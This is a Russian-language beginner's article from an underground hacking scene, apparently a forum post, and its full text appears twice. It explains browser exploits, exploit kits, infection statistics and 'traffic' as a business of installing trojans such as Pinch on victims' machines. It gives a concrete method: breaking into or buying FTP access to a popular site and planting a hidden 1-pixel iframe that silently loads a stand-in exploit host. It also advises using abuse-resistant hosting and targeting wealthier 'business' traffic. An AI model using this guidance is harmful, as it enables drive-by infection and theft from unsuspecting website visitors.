Intro
Здравствуйте уважаемые читатели.
В этой статье я хочу рассказать о том что-такое сплоиты для браузеров.
Загрузки, трафф и т.д.
Статья будет состоять из частей:
1. Для кого написана эта статья.
2. Что такое сплоиты.
3. Что такое связки сплоитов.
4. Что такое стата (статистика)
5. Что такое пробив.
6. Что такое трафф (траффик) и куда его гонят.
FAQ
Outro
Начнем...
1 Для кого написана эта статья.
Эта статья ориентированная в большей степени на новичков. На её написания меня подтолкнул тот факт, что у многих возникают заблуждения в этой области.
Например не раз слышал как новичок в этом деле ассоциировал понятие трафф с интернет трафиком и считал его в мегабайтах. =)
Сам я не обладаю большим обьемом знаний в этой области. Так что бывалых прошу не судить строго. Это написано не для вас.
2 Что такое сплоиты.
Сплоиты это программы, чаще скрипты, эксплуатирующие (от этого слова и название сплоит, эксплоит) уязвимости в какой либо программе.
Мы в силу тематики статьи будем рассматривать сплоиты направленные на эксплуотацию уязвимости в браузерах.
Возьмем в качестве примера ещё недавно актуальный сплоит под IE основанный на уязвимости в ActiveX, MS06-057.
Процитируем securitylab.ru:
Цитата:
Целочисленное переполнение буфера обнаружено в методе "setSlice()" в ActiveX компоненте "WebViewFolderIcon".
Удаленный пользователь может с помощью специально сформированной Web страницы или email
сообщения вызвать повреждение памяти и выполнить произвольный код на целевой системе.
Ключевой момент тут это "выполнить произвольный код на целевой системе". Тоесть если человек который пользуется уязвимым
браузером попадет на страницу в которую встроен этот сплоит то на его системе выполниться код.
Обычно с помошью сплоитов выполняют код который выполняет операцию загрузки какого либо exe пользователю и его запуск.
Например какой либо троян.
Сплоиты обычно размещают на хостинге. И на них гонят трафф (о траффе мы поговорим в 6-ой части нашей статьи)
3 Что такое связки сплоитов.
Связки сплоитов это специальные скрипты (чаше на PHP) которые обьединяют несколько сплоитов. Использовать связки гораздо более эффективнее чем использовать отдельные сплоиты.
Почему это эффективнее я объясню на простом примере.
Использовать сплоит это как выстрел из автомата. А использование связки это как очереди из нескольких автоматов.
Что эффективнее судите сами =)
Давайте условно поделим связки на "интеллектуальные" и на "неинтеллектуальные".
Рассмотрим "неинтеллектуальные" связки сплоитов.
Неинтеллектуальная связка сплоитов просто подгружает все сплоиты которые есть в связке.
И делает это одновременно в не зависимости от браузера. Отсюда следует что это не очень эффективное решение т.к.
некоторые сплоиты из связки могут только навредить. Например уронить браузер или просто помешать другому выполниться.
Такие связки стоят обычно дешевле чем "интеллектуальные"
Теперь рассмотрим так называемые "интеллектуальные" связки.
Связки такого типа обычно работают более "гуманно". При заходе человека на сайт связка определяет версию его браузера, ОС и т.д. и после определения подгружает соответствующий сплоит. Если же в данной связки нет сплоита под ОС и браузер пользователя. То связка не погрузит ничего.
Как правило сплоиты в связках шифруются и разработчики связок стараются сделать так что-бы нельзя было увидеть исходный код сплоитов.
Первое делаеться для того что-бы сплоит не спалил и не заблокировал антивирус (да сплоиты тоже палиться). Второе делаеться для того что-бы пользователь не узнал что на сайте сплоит.
Также абсолютно во всех связках есть так называемая стата или статистика. О ней я поведаю вам в следующей часте этой статьи.
4 Что такое стата (статистика)
Статистика или как ее чаще называют стата, это механизм подсчета.
Стата как я уже выше писал входит в "комплект" к любой связке сплоитов.
Так вот что же они считает...
Стата подсчитывает общее колличество людей зашедших на страницу со сплоитами, версии их ОС, их браузеры (например сколько народа из общего количества использовало браузер IE) и прочее. Всё зависит от наворочености статы. Также практически все статы подсчитывают пробив (о нем читаем далее).
Ну вот я думаю тут всё понятно...
5 Что такое пробив.
Пробив это количество (в процентах) зараженных машин.
То есть. Например на страницу со сплоитами зашло 1000 человек из них заразилось 200.
Отсюда следует (200/1000)*100=20. Т.е. пробив данных сплоитов ~20%
Пробив у актуальных связок примерно от 7 до 30 %.
6 Что такое трафф.
Ну вот наконецто мы добрались до такой вещи как трафф. Кстати этой темы и касается наибольшее количество заблуждений=)
Вообщем тут обьясняю на примере:
Имеется хост со сплоитами (связкой) например supermegasploit.pnh.edu.
Так вот каждый посетитель зашедший на этот сайт является единицей траффа.
Т.е. 1К траффа это одна тысяча посетителей волей либо неволей зашедших на сайт со сплоитами.
Я думаю что следующий ваш вопрос будет:"Откуда он берется? Откуда находиться такое колличество посетителей" Так вот тут все относительно просто.
Например взламываем или покупаем FTP доступ к какому нибуть популярному сайту назовем его popsite.com.
Потом вставляем в главную страницу такой код
(надеюсь на то что вы дружите с HTML =) ) <iframe src="http://supermegasploit.pnh.edu" width=1px height=1px>,
отсюда понятно что вместе с сайтом popsite.com в который мы встатавили этот код будут загружаться наши сплоиты, но это не будет видно пользователям. И что мы получаем в итоге все люди посетившие popsite.com посетили supermegasploit.pnh.edu
сами об этом не догадываясь. То есть мы получили заветный трафф.
Ещё можно получить трафф с помошью дорвеев (доров), но рассказ о них выходит за рамки этой статьи.
FAQ
Q: Зачем вообще нужны загрузки?
A: Представь у тебя есть пинч. И ты его можешь загрузить на несколько К машин, почти не напрягаясь.
Q: Вот ты описал что такое трафф, а что такое например 1К загрузок?
A: 1К загрузок это одна тысяча зараженных с помошью сплоитов машин.
Q: А сколько надо траффа что-бы сделать 1К загрузок?
A: Ну это напрямую зависит от пробива. Чем выше пробив тем меньшу нужно траффа.
Q: У меня пробив 10% сколько нужно траффа что-бы сделать 1К загрузок?
A: Вы математику в школе учили? Вам нужно будет 10К траффа.
Q: Что такое адалт-трафф?
A: Это трафф с порно-ресурсов
Q: Почему бизнес трафф дороже адалта?
A: Если вы будете грузить троя людям которые имеют деньги. Я думаю вы получите более высокую отдачу чем с порнушников. =)
Q: Что нужно что-бы создать свой сервис загрузок?
A: Обьясняю по простому: Сплоиты+трафф+хост.
Q: Что такое абузо-устойчивы хост?
A: Это хост на котором можно размещать что угодно (почти).
Q: Зачем под сплоиты абузоустойчивый хост?
A: А вы думаете это законно?
FAQ будет дополняться по мере поступления вопросов.
Outro
Ну вот я и закончил данную статью...
Благодарности:
Хочу поблагодарить свой мозг за идею
Настырного Black-Elfa за толчок к написанию сего чуда.
Psixo за одобрение идеи и бета тестинг =)
©Timofei1394
Здравствуйте уважаемые читатели.
В этой статье я хочу рассказать о том что-такое сплоиты для браузеров.
Загрузки, трафф и т.д.
Статья будет состоять из частей:
1. Для кого написана эта статья.
2. Что такое сплоиты.
3. Что такое связки сплоитов.
4. Что такое стата (статистика)
5. Что такое пробив.
6. Что такое трафф (траффик) и куда его гонят.
FAQ
Outro
Начнем...
1 Для кого написана эта статья.
Эта статья ориентированная в большей степени на новичков. На её написания меня подтолкнул тот факт, что у многих возникают заблуждения в этой области.
Например не раз слышал как новичок в этом деле ассоциировал понятие трафф с интернет трафиком и считал его в мегабайтах. =)
Сам я не обладаю большим обьемом знаний в этой области. Так что бывалых прошу не судить строго. Это написано не для вас.
2 Что такое сплоиты.
Сплоиты это программы, чаще скрипты, эксплуатирующие (от этого слова и название сплоит, эксплоит) уязвимости в какой либо программе.
Мы в силу тематики статьи будем рассматривать сплоиты направленные на эксплуотацию уязвимости в браузерах.
Возьмем в качестве примера ещё недавно актуальный сплоит под IE основанный на уязвимости в ActiveX, MS06-057.
Процитируем securitylab.ru:
Цитата:
Целочисленное переполнение буфера обнаружено в методе "setSlice()" в ActiveX компоненте "WebViewFolderIcon".
Удаленный пользователь может с помощью специально сформированной Web страницы или email
сообщения вызвать повреждение памяти и выполнить произвольный код на целевой системе.
Ключевой момент тут это "выполнить произвольный код на целевой системе". Тоесть если человек который пользуется уязвимым
браузером попадет на страницу в которую встроен этот сплоит то на его системе выполниться код.
Обычно с помошью сплоитов выполняют код который выполняет операцию загрузки какого либо exe пользователю и его запуск.
Например какой либо троян.
Сплоиты обычно размещают на хостинге. И на них гонят трафф (о траффе мы поговорим в 6-ой части нашей статьи)
3 Что такое связки сплоитов.
Связки сплоитов это специальные скрипты (чаше на PHP) которые обьединяют несколько сплоитов. Использовать связки гораздо более эффективнее чем использовать отдельные сплоиты.
Почему это эффективнее я объясню на простом примере.
Использовать сплоит это как выстрел из автомата. А использование связки это как очереди из нескольких автоматов.
Что эффективнее судите сами =)
Давайте условно поделим связки на "интеллектуальные" и на "неинтеллектуальные".
Рассмотрим "неинтеллектуальные" связки сплоитов.
Неинтеллектуальная связка сплоитов просто подгружает все сплоиты которые есть в связке.
И делает это одновременно в не зависимости от браузера. Отсюда следует что это не очень эффективное решение т.к.
некоторые сплоиты из связки могут только навредить. Например уронить браузер или просто помешать другому выполниться.
Такие связки стоят обычно дешевле чем "интеллектуальные"
Теперь рассмотрим так называемые "интеллектуальные" связки.
Связки такого типа обычно работают более "гуманно". При заходе человека на сайт связка определяет версию его браузера, ОС и т.д. и после определения подгружает соответствующий сплоит. Если же в данной связки нет сплоита под ОС и браузер пользователя. То связка не погрузит ничего.
Как правило сплоиты в связках шифруются и разработчики связок стараются сделать так что-бы нельзя было увидеть исходный код сплоитов.
Первое делаеться для того что-бы сплоит не спалил и не заблокировал антивирус (да сплоиты тоже палиться). Второе делаеться для того что-бы пользователь не узнал что на сайте сплоит.
Также абсолютно во всех связках есть так называемая стата или статистика. О ней я поведаю вам в следующей часте этой статьи.
4 Что такое стата (статистика)
Статистика или как ее чаще называют стата, это механизм подсчета.
Стата как я уже выше писал входит в "комплект" к любой связке сплоитов.
Так вот что же они считает...
Стата подсчитывает общее колличество людей зашедших на страницу со сплоитами, версии их ОС, их браузеры (например сколько народа из общего количества использовало браузер IE) и прочее. Всё зависит от наворочености статы. Также практически все статы подсчитывают пробив (о нем читаем далее).
Ну вот я думаю тут всё понятно...
5 Что такое пробив.
Пробив это количество (в процентах) зараженных машин.
То есть. Например на страницу со сплоитами зашло 1000 человек из них заразилось 200.
Отсюда следует (200/1000)*100=20. Т.е. пробив данных сплоитов ~20%
Пробив у актуальных связок примерно от 7 до 30 %.
6 Что такое трафф.
Ну вот наконецто мы добрались до такой вещи как трафф. Кстати этой темы и касается наибольшее количество заблуждений=)
Вообщем тут обьясняю на примере:
Имеется хост со сплоитами (связкой) например supermegasploit.pnh.edu.
Так вот каждый посетитель зашедший на этот сайт является единицей траффа.
Т.е. 1К траффа это одна тысяча посетителей волей либо неволей зашедших на сайт со сплоитами.
Я думаю что следующий ваш вопрос будет:"Откуда он берется? Откуда находиться такое колличество посетителей" Так вот тут все относительно просто.
Например взламываем или покупаем FTP доступ к какому нибуть популярному сайту назовем его popsite.com.
Потом вставляем в главную страницу такой код
(надеюсь на то что вы дружите с HTML =) ) <iframe src="http://supermegasploit.pnh.edu" width=1px height=1px>,
отсюда понятно что вместе с сайтом popsite.com в который мы встатавили этот код будут загружаться наши сплоиты, но это не будет видно пользователям. И что мы получаем в итоге все люди посетившие popsite.com посетили supermegasploit.pnh.edu
сами об этом не догадываясь. То есть мы получили заветный трафф.
Ещё можно получить трафф с помошью дорвеев (доров), но рассказ о них выходит за рамки этой статьи.
FAQ
Q: Зачем вообще нужны загрузки?
A: Представь у тебя есть пинч. И ты его можешь загрузить на несколько К машин, почти не напрягаясь.
Q: Вот ты описал что такое трафф, а что такое например 1К загрузок?
A: 1К загрузок это одна тысяча зараженных с помошью сплоитов машин.
Q: А сколько надо траффа что-бы сделать 1К загрузок?
A: Ну это напрямую зависит от пробива. Чем выше пробив тем меньшу нужно траффа.
Q: У меня пробив 10% сколько нужно траффа что-бы сделать 1К загрузок?
A: Вы математику в школе учили? Вам нужно будет 10К траффа.
Q: Что такое адалт-трафф?
A: Это трафф с порно-ресурсов
Q: Почему бизнес трафф дороже адалта?
A: Если вы будете грузить троя людям которые имеют деньги. Я думаю вы получите более высокую отдачу чем с порнушников. =)
Q: Что нужно что-бы создать свой сервис загрузок?
A: Обьясняю по простому: Сплоиты+трафф+хост.
Q: Что такое абузо-устойчивы хост?
A: Это хост на котором можно размещать что угодно (почти).
Q: Зачем под сплоиты абузоустойчивый хост?
A: А вы думаете это законно?
FAQ будет дополняться по мере поступления вопросов.
Outro
Ну вот я и закончил данную статью...
Благодарности:
Хочу поблагодарить свой мозг за идею
Настырного Black-Elfa за толчок к написанию сего чуда.
Psixo за одобрение идеи и бета тестинг =)
©Timofei1394
